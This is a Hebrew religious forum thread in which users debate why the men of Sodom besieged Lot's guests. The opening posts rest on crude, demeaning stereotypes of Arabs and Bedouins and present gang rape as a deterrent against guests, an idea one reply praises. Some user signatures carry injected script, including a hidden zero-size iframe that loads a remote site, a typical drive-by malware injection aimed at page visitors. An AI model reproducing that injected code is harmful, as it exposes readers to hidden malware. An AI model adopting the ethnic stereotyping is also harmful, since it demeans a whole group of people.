בית פורומים עצור כאן חושבים

לוט בסדום – נפל לי האסימון

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-4/11/2012 13:36 לינק ישיר 
לוט בסדום – נפל לי האסימון

גם אני, כמוכם, שנים מסתובב עם בטן מלאה על הסיפור של סדום. בכתובים ובאגדה, מה בדיוק היה שם? מה היתה הבעיה של אנשי סדום עם שני האורחים, עד שכל אנשי העיר מנער ועד זקן טף ונשים צבאו על הבית, בשביל מה? בשביל לרבוע אותם? (אמרו לנו שיש חוק שאסור לארח, אבל אנשי סדום לא באו בכלל להעניש את לוט, שהוא היה פורע החוק כאן). ואיך בדיוק לוט חשב שהדבר הנכון מצדו להוציא אל ההמון את שתי בנותיו? וההמון הסדומי האם היו פראיירים, מדוע לא קפצו על ההצעה? ומה קרה שם במערה? לוט היה צדיק בסדום או אידיוט גמור?

השבת הסתכלתי על הדברים בעין פרקטית. ניסיתי לשחזר את סדום, ונראה לי שהצלחתי. ככר הירדן היתה מקום פורה כגן ה'. תושבי הקבע של המקום היו מדושנים, בעוד בכל האיזור שמדרום ומזרח להם היו רק נודדים, וגם ממערבם היו חלק גדול מהאנשים נודדים, על בורות מים לא ידעו אז, רק על בארות. בארות נגמרות בשלב מסויים, וגם אם לא, העשבים למרעה נגמרים. האיזור שרץ בערבים נודדים.

אצל הערבים כידוע הכנסת אורחים היא עקרון קדוש, שכן בלעדיו אי אפשר לשרוד, נודדים עד שמוצאים מקום מים ואוכל, ולפעמים נודדים עד כלות המשאבים ויכולת ההישרדות. ברגע שמגיעים למקום מים ואוכל, לא משנה של מי הם, אורח יש להכניס ולדאוג לו. זה חוק המדבר. נוה מדבר הוא של כולם. רק נוה מדבר אחד לא היה מיועד לכולם, סדום.

הערבים הנודדים במדבר יהודה ואולי גם מעבר הירדן המזרחי, היו מגיעים לעתים בנדודיהם לסדום, ובאופן טבעי ציפו שיארחו אותם כיד המלך, שיתנו להם מים אוכל ולינה, שהרי גם אם הסדומי יתקע עם גמלו בלב המדבר, הבדואי יעשה עבורו הכל וישחט עבורו את הכבש האחרון. הבעיה היא שהסדומים לא התענינו בטיולים במדבר, היה להם הכל בסדום, וכל מה שהם רצו הוא לעצור את הערבים שמגיעים בחמולות לדשא של הפארק המרכזי, זה עם האגם, שוחטים שם את הכבשים שלהם, ומשאירים שקיות של ברכול ונילונים חד פעמיים. הנשים שלהם מכוסות מכף רגל ועד ראש ואין מה לראות, לא יושבות ליד הגברים הזרים ולא מפרגנות להם שום קריצה. בקיצור גועל נפש של בני אדם. (אומרים שפעם ערביה אחת העירה לסדומית שרחצה בעירום + חוטים, אבל זו שערוריה נפרדת).

בשביל זה תיקנו אנשי הרוח והוגי הדעות של סדום, שאסור להתנהג אל בדואים כמו בדואי, אסור לעשות להם את הטקס שאתם אורחים שלי וכו' וכו' כמו שעשה אברהם. ייתכן שהיו מלונות בתשלום, מסעדות בתשלום, וכיוצא בזה, שם לא ירקו לא קיללו ולא פיצחו גרעינים, תתנהגו כמונו ואתם רצויים. אבל ההתנהגות הבדואית הפרימיטיבית של הכנסת אורחים גזעית היתה אסורה, והנשק שהומצא נגדה היה פגיעה בכבוד של הערבי.

בשביל סדומי צפוני קלאסי בוגר, חויה הומוסקסואלית היא ענין סובייקטיבי, מוצא חן בעיניו או שלא, הוא ישטוף את החוייה במקלחת וינסה להמשיך הלאה. בשביל הערבי מדובר בפגיעה והשפלה שהוא בחיים לא יוכל לצאת ממנה, הוא מטומא ומושפל, ועד יום מותו הוא יהיה זה שעשו לו כך וכך.

את הנשק הזה הפעילו הסדומים כנגד הערבים שעברו את הגבול, התארחת, תשלם בכבודך, בערכים הטפשיים שלך, ומובטח להם לערבים שיותר הם לא ינסו את הכיוון של להתארח בסדום.

דווח על תוכן פוגעני

נשלח ב-4/11/2012 13:36 לינק ישיר 

לוט הפך לתושב קבע בסדום, הג'וינט ארגן לו תקציב מיוחד להשלים בגרויות, וכך נפטר מהבערות הערבית, הסדומים הרי היו פתוחים וקיבלו את השונה, (כל עוד הוא מאמץ את השקפתם). אבל כשראה שני ערבים מתקרבים כחום היום, שכח את כל הנימוסים והתרבות שלימדו אותו הצפונים בסדום, והכניס אותם לביתו. הסדומים כמו כל חברה פתוחה, עמדו על העקרונות שלהם במחאה חברתית אדירה. לוט שהבין בדיוק מה קורה היתמם, והציע להם בילוי עם בנותיו, כאשר ברור לכל שההצעה היתה חסרת טעם, שידול לזנות אסור לפי החוק הסדומי, וכמעט שרצו לעצור אותו על הטרדה מינית, "משגל מוצאים במועדון, וזו הדרך התרבותית!". יש כאן גם מן הגוזמה הבדואית החביבה, "אתם אורחים שלי, אני אעדיף לתת את הבנות שלי, מאשר אתכם". אף שהוא ידע שאת הבנות שלו אף אחד לא יקח כרגע, מכיון שהענין כאן הוא עקרוני.

ואכן כצפוי הסדומים התנגדו להדרת גברים, לא יתכן שנותנים לאורח אשה לבלות עמה את הלילה, ואילו לקשר עם גבר מתיחסים כדבר טמא ומשפיל?? ההתנשאות הזו, הקיצוניות הזו, לא נתנה להם מנוח. והם מחו כמו שרק ציבור ספונטני יודע למחות מחאה ספונטנית ובלתי תלויה.

למזלינו הרב בעלי המשקפיים העגולות הסתנוורו, והמשקפים לא עזרו להם, הם לא הצליחו ללמד את הערבים פרק בפתיחות דו מינית. ואם לא שהיו נהפכים, עד היום היינו שומעים את הסיפור שלהם עד כמה שהם צודקים, ואיך הצליחו להדביר את התת תרבות הערבית עם הנילונים והרעלות.

לוט לעומת זאת נשאר אובד דרך, הוא היה 'ערבי חדש' שקרוע בין שני העולמות, העובדה שסדום נהפכה לא נתפסה אצלו כגויעת החזון הסדומי וחזרה למרחבי הנדודים הערביים, אלא הוא היה בטוח שהכל נגמר, גם הערבים גם הסדומים, כולם התהפכו. הערבים שהצילו אותו נעלמו ועובדה שהם לא כאן אתו לתמוך בו (בטח הלכו להפוך עוד מקום, החוליגנים האלו), הסדומים התהפכו, זה אומר מן הסתם שיש להזריק לוריד אלכוהול עד כדי איבוד חושים והכרה, לילה אחרי לילה התמכר לו בפס רחב של חומר, 5 מגה לשניה זרמו אל תוך עורקיו, ורק אלהים יודע איפה הוא מצא במערה חומר כה משובח. עושה רושם שהשם 'יין' אינו אלא מטאפורה. בנותיו שהיו 'ערביות חדשות' דור שני, היו נטולות גזעיות ערבית, וגם נטולות עמוד שדרה סדומי – חסרות מוסר וחסרות נימוס וטקט, התובנה הגבוהה ביותר שלהן היתה לשכב עם אבא לפחות פעמיים, כי עין הרע חיסלה את כל העולם, אבל מן הסתם עין הרע רוצה עכשיו שעכשיו נשכב עם אבא. מהיעדר אסטרולוגית צמודה, הן עשו את החישוב האסטרולוגי בעצמן, וגם קראו בגאווה לבניהם החמודים על שם המאורע המחוכם פרי תבונתן.

זה היה הרגע המכונן של שתי אומות חדשות העונות לשם האסתטי "עמון ומואב". מדינות של ערבים חדשים, שמשה רבינו שמר מהם מרחק ולא קיבל את ילדיהם לבתי הספר או את בנותיהם למוסדות השידוכים הישראליים. אבל לא נלחם בהם. רק דוד המלך הכניע אותם ישירות, לאחר שנות עריצות ושעבוד בהם השתלטו העמונים והמואבים פעם אחר פעם על התקציב ועל השטחים, כאשר הם ממשיכים במדיניות ה'התארחות' של הערבים, המשתלטים על כל מה שהם רואים וטוענים שזה היה שלהם מעולם, אבל המדיניות היתה חד צדדית, מהגמחי"ם שהם כפו על הישראלים להעניק להם הם נהנו למהדרין, אבל במדינה שלהם לא היה גמ"ח, הבנקים שלהם לקחו ריבית רצחנית. לא היו מקדמים בלחם ומים אף אחד, לא היו מרשים לעבור לאף אחד, כל הפארקים היו סגורים, אבל הם חייכו כל כך יפה אל השונה, מעבר לגדר. הם היו ערבים חדשים, נהנתנים, מתרפקים על הערכים כדי לזלול מהם, ובפועל ריקים מכל תוכן ממשי.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 15:17 לינק ישיר 

לפי פשוטם של מקראות לא היה כל איסור בסדום להכניס אורחים,
לוט ישב בשערי העיר- היה שופט?- וראה את שני המלאכים, לא סביר והגיוני שהיה עובר על החוק בפרסיא. ומלין אותם בין כתלי ביתו ומסתכן במשפט כעובר על חוקי סדום, שהעונש היה מות.
המלאכים כנראה היו אנשים בעלי יופי- של מלאכים- ולכן בני העיר חשקו בהם, כפי שכתוב נדע אותם.
הבנות הצעירות של לוט לא היוו תחליף ליופים של המלאכים, שבהם חשקו אנשי סדום.. כפי שכתוב.

כך  פשוטם של הכתוב- הדרשות יפות יותר כמובן.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 19:35 לינק ישיר 

לפי הפשט המלאכים היו בעלי יופי של מלאכים?? איך הגעת לזה, לפי הפשט הם נראו כמו ערבים. ומי גילה לך שהעונש על אירוח היה מוות? נראה לך הגיוני שאם הגיעו שני אנשים יפים לעיר מיד "כל אנשי העיר מנער ועד זקן" יעמדו בתור כדי לאנוס את האנשים היפים????? אפילו בתל אביב זה לא קורה בדיוק כך, קל וחומר בסדום.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 19:38 לינק ישיר 

פרוגרמי

טול איקון ירוק. ויותר מאחד.

על הכתיבה, על הפרשנות, על האקטואליה השנונה.

וביותר על הרעיון: שהאונס הקבוצתי החד מיני המתוכנן נועד כדי להבריח אורחים. זה רעיון מופלא! תודה.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 19:48 לינק ישיר 

פרוגרמי.

מענין אתה כנראה לא קורא מהכתוב בתורה- כנראה שאסור לך לקרא בתנ"ך, בתורה כתוב ויבואו המלאכים ולא ערבים
 ואפילו לא אנשים, מה לעשות אבל האמירה המפורסמת יפה כמו מלאך -מתאימה- העובדה שאנשי סדום לא צעקו על לוט- למה אתה מלין או מכניס אורחים? אלא אומרים לו  זוז הצידה, ותן לנו לידע אותם,
כמו בתל אביב גם בסדום אנשים יפים מושכים תשומת לב, ומיד מנסים לאנוס אותם.-

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 19:51 לינק ישיר 

ירוחם, אני לא טוען שפירושך מופרך, הוא דוקא מענין. אבל אינך יכול להציג אותו כאילו הוא הפשט הפשוט. כתוב ויבואו המלאכים בתיאור הראשוני, עבורינו, שכבר יודעים מהסיפור הקודם שהם מלאכים. אבל לוט לא ידע שהם מלאכים, לכן הוא הכין להם אוכל, וגם אנשי סדום אומרים 'איה האנשים'. לעניות דעתי, בפירושך אין הגיון, אבל יהי לך אשר לך, ובלבד שלא תכריז שמי שלא חושב כמוך אות הוא שאסור לו לקרוא בתנ"ך.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 20:30 לינק ישיר 

ירוחם מנין לך שמלאכים יפים?
יפה כמו מלאך הוא ביטוי מאוחר מאד אי אפשר להלביש אותו על המקרא.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 20:38 לינק ישיר 

לא טענתי מעולם שפרושי הוא הפרוש, הסתמכתי על הגיון הכתוב- ההגיון שלי-. הכתוב קורא להם מלאכים- כמובן שהם היו מחופשים לאנשים- כנראה יפים.
אצל אברהם ביקרו 3 אנשים- לסדום הגיעו 2 מלאכים.- בלי רש"י.- האנשים והמלאכים לא בהכרח אותם אנשים, כפשט ודאי שלא.
באשכול הסמוך נכתב על הבעיתיות בחברה החרדית עם התנ"ך- כתבתי בחיוך את מה שכתבי- כי התעלמת מהמילה הכתובה מלאכים.
כולם מדברים על 70 פנים לתורה, איזה יופי. אבל כשמנסים לפרש פן החמישי, או אפילו שלישי- אנשים יוצאים מגדרם להכחיש לבטל ולזלזל. לא אתה.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 20:47 לינק ישיר 

הסבר יפה, ש'גזרו' על הכנסת אורחים בשביל לגדור מנוודי המדבר, ועם זאת, לרמיזתך לפרשית גן העיר מודיעין, יש לשאול, איך במודיעין עילית יקבלו אורחים ממודיעין? עם הסיבות הטובות שישנן, מן הסתם, אין לו לאדם להתלונן על שמקבל מידה כנגד מידה.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 20:48 לינק ישיר 

מזכיר קצת את ספור הפארק בענבה...
מה לעשות יש קצת צדק אצל הסדומים אם "הערבים" לא היו משאירים שקיות של ברכול ונילונים חד פעמיים ומעירים הערות אולי כל זה היה נחסך.
במיוחד שה"ערבים" הנחמדים יורדים כל הזמן על דרך חייהם של ה"סדומים" אבל לא מהססים להנות ממנעמיהם.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 21:09 לינק ישיר 

מיימוני כתב:
פרוגרמי

טול איקון ירוק. ויותר מאחד.

על הכתיבה, על הפרשנות, על האקטואליה השנונה.

וביותר על הרעיון: שהאונס הקבוצתי החד מיני המתוכנן נועד כדי להבריח אורחים. זה רעיון מופלא! תודה.

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

המטרה של האונס ברורה, כדי להבריח אורחים, שהרי אם האונס היה מטרה בפני עצמה, היו אנשי סדום מרבים באורחים על מנת לאנוס אותם.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 21:22 לינק ישיר 

פרוגרמי

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 21:38 לינק ישיר 

צר לי אך שלא כמו כמה מהאנשים כאן איני מתפעל כלל.
אינני מבין כלל מה הקושיה שמנסה פרוגרמי לענות עליה, וודאי שאינני מתרשם מפרושו נוטף הארס.

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 21:42 לינק ישיר 

איפה בתורה כתוב אפילו ברמז שגזרו בסדום על הכנסת אורחים?

דדווח על תוכן פוגעני

נשלח ב-4/11/2012 22:07 לינק ישיר 

נאמרו באשכול זה שני פירושים שבעיני הם מחודשים.

ושניהם באו לענות על שאלה שאולי אינה שאלה.

וזו השאלה: מפני מה התאוו אנשי סדום לבוא על המלאכים, שזו ביאה שלא כדרך הטבע.

אפשרות פשוטה, ואולי היא הנכונה, היא שאכן בסדום לקו בבעיה זו, שהיתה מצויה דרך משל באתונה של יוון, והיום אסור לומר עליה שזו בעיה כל זמן שזה "בהסכמה" (אמור להיות סמיילי עצוב).

פרוגרמי הציע: האונס נועד לדכא את מי שחושב להגיע לסדום, שיברח ולא יגיע.

ירוחם הציע: המלאכים היו מאד יפים ולכן עוררו חשק.

שני הרעיונות לדעתי מאד מוצלחים.

לגבי האחרון, לא ידוע לנו איך נראו המלאכים, כלומר איך חשבו בני אדם בימים ההם שמלאכים אמורים להראות. האם דימו אותם כיפים באופן מיוחד, כפי שהם במסורת הנוצרית, ובציורי דה וינצ'י והתקופה, ובסיפור על לוציפר שנפל, ועוד?

יש לזכור כי גם בעם ישראל היתה לפחות כת אחת שהאמינה שהמלאכים נזכרים בתורה, והם אלו שנכשלו עם בנות האדם (בני האלוהים=המלאכים). חז"ל דחו את הפרשנות הזו, ורשב"י קילל מי שפירש כך, אבל זה אומר שהתפיסה הזו היתה קיימת בימיהם, כי הם טרחו להתנגד לה בתקיפות. וכמובן, לדורות למרבה הצער (שלי לפחות) גישה זו הפכה לכאילו היסטוריה...

אם המלאכים היו מאד יפים, ניתן להבין איך בנות האדם התפתו להם.

ואמנם נראה לי סביר לשער שמלאך ייראה יפה באופן מיוחד לאדם, "שמיימי". שהרי "העולם העליון" אמור להיות הרבה יותר יפה מאשר העולם שלנו. אני תולה זאת בפסיכולוגיה האנושית, שכך היא תופסת את "העליונים", ואני הולך בדרכו של יונג, שסבר שיש ארכיטיפים של החשיבה או הדמיון האנושי.

אשר על כן פירושו של ירוחם נראה סביר מאד בעיני.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > לוט בסדום – נפל לי האסימון
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 לדף הבא סך הכל 4 דפים.

bholext